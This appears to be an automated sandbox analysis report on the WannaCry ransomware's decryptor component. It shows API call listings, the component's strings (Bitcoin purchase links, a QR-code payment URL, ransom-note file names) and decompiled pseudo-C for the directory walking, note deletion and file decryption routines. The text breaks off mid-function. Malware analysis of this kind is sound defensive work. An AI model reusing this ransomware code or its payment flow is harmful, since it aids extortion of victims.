0x00407249
0x00407249
0x00407249
0x00407259
0x0040725b
0x00407262
0x00407269
0x0040726b
0x0040726b
0x00407277
0x00407285
0x00407288
0x0040729f
0x004072b7
0x004072d0
0x004072db
0x004072e8
0x004072ed
0x004072f0
0x004072f9
0x004072fe
0x00407304
0x00407309
0x0040730c
0x00407315
0x00407320
0x00407329
0x00407338
0x00407339
0x0040733e
0x0040733f
0x0040734a
0x0040734f
0x00407358
0x0040735d
0x00407364
0x00407372
0x0040737e
0x0040737f
0x00407384
0x00407385
0x0040738a
0x00407393
0x00407398
0x004073a3
0x004073b8
0x004073ca
0x004073cc
0x004073ce
0x004073d6
0x004073e6
0x004073e8
0x004073ea
0x004073fc
0x004073ff
0x0040740c
0x00407418
0x0040741b
0x00407423
0x0040742c
0x00407435
0x00407442
0x00407449
0x00407452
0x0040745b
0x00407466
0x00407472
0x00407477
0x00407481
0x0040748a
0x00407493
0x004074a0
0x004074a7
0x004074b0
0x004074b9
0x004074c4
0x004074d0
0x004074da
0x004074f3
0x00407503
0x0040750e
0x00407520
0x00407539
0x00407544
0x00407549
0x00407559
0x00407560
0x00407561
0x00407568
0x0040756d
0x0040756e
0x0040757d
0x00407596
0x0040759b
0x004075ad
0x004075c6
0x004075c7
0x004075d6
0x004075e6
0x004075ed
0x004075ee
0x004075ef
0x004075f5
0x004075fa
0x004075fb
0x00407600
0x00407605
0x00407607
0x00407610
0x0040761b
0x0040762a
0x00407638

APIs

Part of subcall function 004076A0: time.MSVCRT ref: 004076DA

CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
#1641.MFC42(00000000,?,755720C0,?), ref: 00406FBC
CreateSolidBrush.GDI32(00121284), ref: 00406FC6
#1641.MFC42(00000000,?,755720C0,?), ref: 00406FCF
CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
#1641.MFC42(00000000,?,755720C0,?), ref: 00406FE2
CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
#1641.MFC42(00000000,?,755720C0,?), ref: 00406FF5
CreateSolidBrush.GDI32(00000000), ref: 00406FFC
#1641.MFC42(00000000,?,755720C0,?), ref: 00407005
CreateSolidBrush.GDI32(003834D1), ref: 0040700F
#1641.MFC42(00000000,?,755720C0,?), ref: 00407018
CreateSolidBrush.GDI32(00107C10), ref: 00407022
#1641.MFC42(00000000,?,755720C0,?), ref: 0040702B
CreateSolidBrush.GDI32(00E8A200), ref: 00407035
#1641.MFC42(00000000,?,755720C0,?), ref: 0040703E
CreateSolidBrush.GDI32(00D77800), ref: 00407048
#1641.MFC42(00000000,?,755720C0,?), ref: 00407051
CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
#1641.MFC42(00000000,?,755720C0,?), ref: 00407064
CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
#1641.MFC42(00000000,?,755720C0,?), ref: 0040709C
CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
#1641.MFC42(00000000,?,755720C0,?), ref: 004070CE
CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
#1641.MFC42(00000000,?,755720C0,?), ref: 00407104
#3092.MFC42(000003ED,00000000,?,755720C0,?), ref: 00407110
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
#3092.MFC42(000003FE,?,755720C0,?), ref: 00407134
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
#3092.MFC42(000003FB,?,755720C0,?), ref: 00407156
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
#3092.MFC42(000003FF,?,755720C0,?), ref: 00407178
SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
#3092.MFC42(000003FC,?,755720C0,?), ref: 0040719A
SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
#3092.MFC42(00000400,?,755720C0,?), ref: 004071BC
SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
#3092.MFC42(000003FA,?,755720C0,?), ref: 004071DE
SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
#3092.MFC42(00000402,?,755720C0,?), ref: 004071FC
SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
#3092.MFC42(000003EF,?,755720C0,?), ref: 0040721E
SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
#3092.MFC42(000003EB,?,755720C0,?), ref: 00407240
SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
#3092.MFC42(000003EC,?,755720C0,?), ref: 00407262
SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
#860.MFC42(?,?,755720C0,?), ref: 00407288
#537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,755720C0,?), ref: 004072F9
#537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,755720C0,?), ref: 00407315
#540.MFC42(?,?,?,?,755720C0,?), ref: 00407329
#2818.MFC42(?,mailto:%s,?,?,?,?,?,755720C0,?), ref: 0040734A
#535.MFC42(?), ref: 0040735D
#2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
#535.MFC42(?), ref: 00407398

Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246

SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
#6140.MFC42(00000002,000000FF), ref: 004073D6
#6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF

Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5

Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905

Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE

Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2

GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA

Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B

SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
#2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
#2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
#6334.MFC42(00000000), ref: 00407607
#800.MFC42 ref: 0040761B

Strings

Arial, xrefs: 00407069, 004070A1, 004070D3
00;00;00;00, xrefs: 0040746B, 004074C9
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s, xrefs: 0040737F
https://www.google.com/search?q=how+to+buy+bitcoin, xrefs: 00407310
https://en.wikipedia.org/wiki/Bitcoin, xrefs: 004072F4
mailto:%s, xrefs: 00407339
%d/%d/%d %02d:%02d:%02d, xrefs: 00407568, 004075F5

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
API String ID: 28786460-3869059234
Opcode ID: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
Opcode Fuzzy Hash: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99

Uniqueness

Uniqueness Score: -1.00%

Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}

0x004026b0
0x004026b2
0x004026bd
0x004026be
0x004026c5
0x004026d3
0x004026db
0x004026e4
0x004026e8
0x004026f1
0x004026fa
0x00402706
0x0040270a
0x00402720
0x00402728
0x0040272e
0x0040273e
0x00402747
0x0040274b
0x004027c2
0x004027c2
0x004027ca
0x00000000
0x00000000
0x004027e1
0x004027e3
0x004027e8
0x004027fb
0x004027fd
0x00402802
0x00402816
0x00402822
0x00402828
0x00402838
0x004028c3
0x004028c5
0x004028ca
0x004028dd
0x004028df
0x004028e4
0x004028f3
0x004028f5
0x004028fa
0x00402905
0x00402909
0x00402914
0x00402916
0x00402923
0x0040293c
0x00402944
0x00402949
0x00402951
0x00000000
0x00402953
0x004028fa
0x004028e4
0x0040283a
0x00402850
0x0040285f
0x00402863
0x0040286e
0x00402870
0x0040287d
0x00402896
0x0040289e
0x004028a3
0x004028ab
0x00402957
0x00402957
0x00402957
0x00402850
0x00402838
0x00402802
0x00402972
0x00000000
0x00000000
0x00000000
0x00402972
0x0040297d
0x00402983
0x00402987
0x0040298b
0x0040298d
0x0040298d
0x00402995
0x00000000
0x00000000
0x0040299b
0x004029a0
0x004029a2
0x004029a2
0x004029aa
0x004029af
0x004029b7
0x00000000
0x00000000
0x00000000
0x004029b7
0x0040298d
0x004029b9
0x004029b9
0x004029bd
0x004029c1
0x004029c3
0x004029c3
0x004029cb
0x00000000
0x00000000
0x004029d1
0x004029d6
0x004029d8
0x004029d8
0x004029e0
0x004029e5
0x004029ed
0x00000000
0x00000000
0x00000000
0x004029ed
0x004029c3
0x004029ef
0x004029ef
0x00402a0c
0x00402a0e
0x00402a16
0x00402a2c
0x00402a2e
0x00402a36
0x00402a3c
0x00402a40
0x00402a47
0x00402a49
0x00402a4d
0x00402a4f
0x00402a4f
0x00402a51
0x00402a5d
0x00402a62
0x00402a66
0x00402a66
0x00402a6a
0x00402a6b
0x00402a70
0x00402a74
0x00402a78
0x00402a7c
0x00402a7f
0x00402a81
0x00402a8e
0x00402a92
0x00402a94
0x00402a98
0x00402aaf
0x00402ab4
0x00402a94
0x00402abe
0x00402abf
0x00402ac4
0x00402ac7
0x0040274d
0x00402751
0x00402765
0x0040276e
0x0040276f
0x00402778
0x0040277b
0x0040277f
0x00402790
0x0040279b
0x004027a4
0x004027a5
0x004027aa
0x004027ad
0x004027ad
0x00402ad7
0x00402ae4

APIs

Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2

swprintf.MSVCRT ref: 00402728
FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
#825.MFC42(?,?,?,?), ref: 0040276F

Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44

#825.MFC42(?), ref: 004027A5
wcscmp.MSVCRT ref: 004027E1
wcscmp.MSVCRT ref: 004027FB
swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
GetFileAttributesW.KERNEL32(?), ref: 00402830
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
wcslen.MSVCRT ref: 0040286E
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
FindNextFileW.KERNEL32(?,?), ref: 0040296A
FindClose.KERNEL32(?), ref: 0040297D

Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56

Strings

@Please_Read_Me@.txt, xrefs: 004028BD, 004029FC
%s\*, xrefs: 0040271A
@WanaDecryptor@.exe.lnk, xrefs: 004028D7, 00402A1C
%s\%s, xrefs: 0040281C, 00402A06, 00402A26
@WanaDecryptor@.bmp, xrefs: 004028ED

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
API String ID: 1037557366-268640142
Opcode ID: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
Opcode Fuzzy Hash: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
